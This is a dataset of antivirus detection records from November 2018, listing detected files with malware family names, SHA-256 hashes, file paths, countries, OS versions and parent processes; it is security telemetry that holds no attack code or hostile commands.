  Row(detection=Row(filename='avscan-20181104-140255-f36b2f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140255-F36B2F86', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninst.exe', filepath='H:\\Meus Documentos\\SIAG\\remover\\uninst.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='6a3ea627f2e0d60ba455d2e35d19a611be9b749aed731ad19ddd85f50a6e04a2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Sunbelt Software\\VIPRE\\SBAMSvc.exe', parentsize=2763080, timestamp='2018-11-04T22:15:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:30:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='81b2028bd8121fca831eafaef363ad131dbf0a93e48d2f1f7c7f71b5de915c29', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:29:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='axcrypt2go.exe', filepath='C:\\Program Files\\Axantum\\AxCrypt\\AxCrypt2Go.exe', filesize=568000, name='W32/Sality.AT.#M1.#R1'), hash='2011ec1b6eef77dfcc59f477f71d3b48d78d1695c41fc6c6222ec259b8f7582b', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:24:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:20:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kddute.exe', filepath='C:\\Program Files (x86)\\Vulcan_v750\\bin\\exe\\kddute.exe', filesize=1856000, name='W32/Sality.AT.#M1.#R1'), hash='804d45cbd71a2c0bfcd30876e559cb54a8a3675dfe2674ccebf5837cbecbd5c9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cubs6ohaG0mJbOG0.1', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T20:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:01:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172523-e2bbc324', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172523-E2BBC324', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:25:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024353', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024353', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:46:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-04T20:43:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T14:24:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082009-9cc411f0', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-081945-97A6A5AB\\AVSCAN-20181104-082009-9CC411F0', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:19:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:30:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-04T15:00:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='171519252.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\171519252.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:15:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T10:36:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134552-48dc0276', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc78524c\\AVSCAN-20181104-134427-3FF740EF\\AVSCAN-20181104-134552-48DC0276', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:41:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='\\\\\\/F \\\\\\/T \\\\\\/R', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wbem\\WMIADAP.exe', parentsize=115200, timestamp='2018-11-04T08:49:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111712-e23c222e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd7627ed\\AVSCAN-20181104-111616-DA8261DA\\AVSCAN-20181104-111712-E23C222E', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:17:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-lan.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-lan.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='34deac3a3ff5894de2a513d6e6a9735af258309f5c0d6a3d890c733fa126ea60', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:43:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151323-c14ea3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150431-7A3251AF\\AVSCAN-20181104-151323-C14EA3FF', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bleach_ cap 346-366.exe', filepath='F:\\Bleach_ Cap 346-366.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='a575da9d2ef9a3242803a58c22e090d66a06769f9853db5bd46eab5a6420c27f', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T15:21:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f89cb', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f89cb', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_02-18-07\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T01:18:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T04:11:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uninstall.exe', filepath='C:\\Program Files\\TeamViewer\\uninstall.exe', filesize=988000, name='W32/Sality.AW.#M1.#R1'), hash='0c291fc0960a4c3d775f5cec79bf0013f58745cc40e7832890eea05fa76820e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T00:51:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8d9d', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8d9d', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-083034-77447914', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cda3c4c5\\AVSCAN-20181104-082912-6C68A279\\AVSCAN-20181104-083034-77447914', filesize=980000, name='PUA/InstallCore.KV.#M1.#R1'), hash='7517d429397d3cc0ec9b5b9ba932648ae51b769354eabec6d24f6914625ae97c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:30:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regtune.exe', filepath='f:\\programs\\harİcİ dİsk\\system programs\\regtune\\RegTune.exe', filesize=192000, name='HEUR/AGEN.1011007.#M1.#R1'), hash='896e5bb9fa834c93efe0dec4384747a8e43d4e581cab7c98eedfd1c5734b87a7', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00005da9', filepath='C:\\Windows\\Temp\\tmp00002f27\\tmp00005da9', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='c56c3bfbbaea0f1c6c9189a8378a96426a3b22f12dfde672d55798098be28213', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T17:19:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:40:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='disque amovible.exe', filepath='D:\\Disque amovible.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213621-b38667a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213621-B38667A4', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A58B659F922447D16438B55B3F196E8B34D909261912FBAE2AFF8EA218C08AF7', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:20:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:37:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T10:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220722-7cd92029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-220722-7CD92029', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FileSplitterJoiner.exe", filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102048-a58f922a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102048-A58F922A', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b0de6bf55065bf7ab05ab40b5e31087d48e80a1d6f7ab5baa7b333a8b57b421e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\B0DE6BF55065BF7AB05AB40B5E31087D48E80A1D6F7AB5BAA7B333A8B57B421E', filesize=512000, name='ADWARE/Taranis.3958.#M1.#R1'), hash='b0de6bf55065bf7ab05ab40b5e31087d48e80a1d6f7ab5baa7b333a8b57b421e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:29:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=103696, timestamp='2018-11-02T09:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ujgygb', filepath='/Library/Application Support/Avira/Quarantine/quarantine/rescan/ujGYgB', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ipssmp.exe', filepath='\\\\?\\D:\\BahanAjar\\IPSSMP.exe', filesize=960000, name='W32/Virut.Gen.#M1.#R1'), hash='b9e32bdde450f980d9ec528660944c555738977656b23cfe7396adf6a8cb6e16', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2015年各类先进统计表l.xls', filepath='D:\\共享文件\\历史\\我的ww - 副本\\2014\\2014年各类先进申报表\\2014先进统计\\2015年各类先进统计表l.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='933cdc4a2bf53541639eed7628eeb1d71557361c02e4fb4269dd7049cd4ec6fe', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T02:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062140-afbb0c56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bae14625\\AVSCAN-20181102-055814-1CD18979\\AVSCAN-20181102-062140-AFBB0C56', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ef13b7b3fb151f5264c5d7ab2a5ee1aba62a472dcfed8285449546176858c249', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\EF13B7B3FB151F5264C5D7AB2A5EE1ABA62A472DCFED8285449546176858C249', filesize=184000, name='W32/Sivis.A.#M1.#R1'), hash='ef13b7b3fb151f5264c5d7ab2a5ee1aba62a472dcfed8285449546176858c249', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:09:09Z'), 